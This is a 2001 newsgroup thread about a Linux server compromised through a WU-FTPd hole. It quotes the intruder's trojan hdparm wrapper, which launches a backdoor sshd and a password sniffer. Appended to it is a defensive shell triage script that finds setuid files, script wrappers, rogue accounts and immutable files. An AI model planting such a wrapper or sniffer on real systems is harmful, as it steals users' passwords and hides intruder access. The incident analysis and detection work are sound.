Re: ftp was hacked
In reply to: Bill Unruh: "Re: ftp was hacked"
From: Ed Turner <netguru1001@yahoo.com> Date: Sun, 30 Dec 2001 04:33:33 GMT
There was an advisory on WU-FTPd. The program has a serious flaw. Most people who care about this have already
switched to other FTP daemons. Right now I wouldn't trust WU-FTPd.
Ed Turner
Chicago, IL
Bill Unruh wrote:
> In <Pine.LNX.4.43.0112281603150.13038-100000@styx.darbonne.com> "R.A.Wilson" <bud@styx.darbonne.com> writes:
>
> ]Hi -
> ]I have some info to pass along, and a question...
>
> ]A cracker exploited a hole in wu-ftp 2.6.0 and managed to install
> ]a sniffer and a port scanner on my machine. I use slackware, 2.2.16
>
> ]The only reason I found out is that a sharp Linux administrator noted
> ]port scans coming from my machine and wanted to know what was going on.
> ]I looked like the bad guy.
>
> ]After a lot of work, I found the intruder had made a directory where
> ]he put his sniffer log and other programs. He had them set up in:
> ] /dev/ida/.inet
> ]I don't believe that's a legitimate directory.
>
> ]When I looked at a file called tcp.log, in that directory, I was
> ]stunned to see he had plain text passwords of all the users on my
> ]machine. I couldn't pull the plug fast enough!
>
> ]He also had managed to put an illegal account in /etc/passwd. He used
> ]the account name www. I found files belonging to www and rm'd them.
> ]I also took him out of the passwd file. I updated wu-ftp to the latest
> ]version of 2.6.2 and thought that solved the problem.
>
> ]A few days later I wanted to install a later version of hdparm. I was
> ]using version 3.9 and 4.6 was out. I did a 'locate hdparm' and found
> ]two of them: one in /usr/bin/hdparm and the other in /usr/sbin/hdparm.
> ]Which was correct? I did 'which hdparm' and found the one in /usr/sbin
> ]was it. It was also a binary file. Curious, I looked at the other one.
> ]This is what it looked like:
>
> ] #!/bin/sh
> ] cd /dev/ida/.inet
> ] ./sshdu -f ./s
> ] ./linsniffer >> ./tcp.log &
> ] cd /
>
> ]So, just by a lucky accident I had discovered the intruder's script to
> ]call his sniffer.
>
> ]I tried to move the file. I tried to edit the file. I tried to remove
> ]it. Nothing. Root cannot touch it! Here's the system message I get
> ]when I try any of the above...
>
> ] cannot unlink 'hdparm': Operation not permitted.
>
> ]Now my question... HOW THE HELL DO I GET RID OF THIS GARBAGE???
>
> ] -Roy Wilson-
> ]===================================================================
>
> What you do is to backup all of your users files and then you wipe the
> disk and reinstall, making sure that you install all of the security
> patches. Then you replace the backup material that you need. Then you
> scan all of that backed up material for suid files and get rid of them.
> eg
> find /home -perm +6000 -ls
>
> PS In answer to your question, read
> man chattr, especially the -i flag.
>
> But as you have discovered the chances of your finding all of the
> backdoors he has installed are nil.
> So do not try. Just reinstall, and remember to keep up with security
> patches. That hole was patched about a year ago.
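A triage script for the four symptoms Roy lists, added here as an example and not part of the original thread or of any tool it names: setuid files under /home (Bill's `find /home -perm +6000 -ls`), a shell script sitting where a compiled binary should be (the fake /usr/bin/hdparm), an unexpected account in /etc/passwd, and an immutable file that root cannot unlink (`man chattr`, the -i flag). It assumes a POSIX shell with `head -c`, a `find` that understands `-perm -4000`, and `lsattr`/`chattr` from e2fsprogs; the function names are hypothetical and `build_sample_tree` constructs a throw-away sample tree rather than reading a real host. It collects evidence, it does not clean anything: Bill's advice to back up, wipe and reinstall stands, since the wrapper Roy found was only the one backdoor he happened to stumble on.

```shell
#!/bin/sh
# Added triage helpers (not from the thread). build_sample_tree creates a
# constructed sample tree; on a real host point the helpers at /home,
# /usr/bin, /usr/sbin, /etc/passwd and / instead.

# Regular files under $1 with the setuid or setgid bit, one per line.
# Same intent as `find /home -perm +6000 -ls`, in portable find syntax.
find_suid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Files directly under $1 that begin with "#!": a text script in a bin
# directory, which is how the fake /usr/bin/hdparm stood out.
find_script_wrappers() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        if [ "$(head -c 2 "$f" 2>/dev/null)" = "#!" ]; then
            printf '%s\n' "$f"
        fi
    done
}

# Accounts in passwd file $1 that are UID 0 but not root, and accounts whose
# name is not in the space-separated baseline $2 (take the baseline from a
# known-good install, never from the compromised host itself).
audit_passwd() {
    awk -F: -v base="$2" '
        BEGIN { n = split(base, b, " "); for (i = 1; i <= n; i++) known[b[i]] = 1 }
        $3 == 0 && $1 != "root" { print "uid0:" $1 }
        !($1 in known)          { print "unknown:" $1 }
    ' "$1"
}

# Files under $1 carrying the ext2/3/4 immutable flag, the reason root got
# "Operation not permitted" on unlink. Needs lsattr (e2fsprogs) and a
# filesystem that supports the flag; prints nothing otherwise.
list_immutable() {
    command -v lsattr >/dev/null 2>&1 || return 0
    lsattr -R "$1" 2>/dev/null |
        awk 'NF == 2 && $1 ~ /^[A-Za-z-]+$/ && index($1, "i") { print $2 }'
}

# Clear the flag so the file can be moved or removed (man chattr, -i); root only.
unlock_immutable() {
    chattr -i "$1"
}

# Constructed sample tree mirroring the layout in the thread; prints its root.
build_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/bin" "$root/usr/sbin" "$root/home/roy" "$root/dev/ida/.inet" "$root/etc"
    # the real hdparm: any non-"#!" bytes stand in for a compiled binary
    printf '\177ELF stand-in\n' > "$root/usr/sbin/hdparm"
    # the intruder's wrapper, as quoted in the thread
    printf '#!/bin/sh\ncd /dev/ida/.inet\n./sshdu -f ./s\n./linsniffer >> ./tcp.log &\ncd /\n' > "$root/usr/bin/hdparm"
    # a script in bin is not proof of compromise by itself; a person still decides
    printf '#!/bin/sh\necho ok\n' > "$root/usr/bin/some-script"
    : > "$root/home/roy/.profile"
    : > "$root/home/roy/backdoor"
    chmod 4755 "$root/home/roy/backdoor"
    # the rogue "www" account; UID 0 is an assumption for the sample, the
    # thread does not say what UID it had
    printf 'root:x:0:0:root:/root:/bin/sh\nroy:x:1000:100::/home/roy:/bin/sh\nwww:x:0:0::/dev/ida/.inet:/bin/sh\n' > "$root/etc/passwd"
    printf '%s\n' "$root"
}

# Stand-alone run against the sample tree.
T=$(build_sample_tree)
echo "setuid/setgid under home:"; find_suid_files "$T/home"
echo "scripts in usr/bin:";       find_script_wrappers "$T/usr/bin"
echo "passwd findings:";          audit_passwd "$T/etc/passwd" "root roy"
echo "immutable files:";          list_immutable "$T"
rm -rf "$T"
```

On the sample tree the run reports `home/roy/backdoor` as setuid, both `usr/bin/hdparm` and `usr/bin/some-script` as scripts (the second is the false positive you have to rule out by hand), and `www` twice, once as a UID 0 account and once as a name missing from the baseline. The immutable check is empty on a temp directory; on Roy's box, `list_immutable /usr/bin` would have shown the wrapper, and `unlock_immutable /usr/bin/hdparm` would have let root remove it.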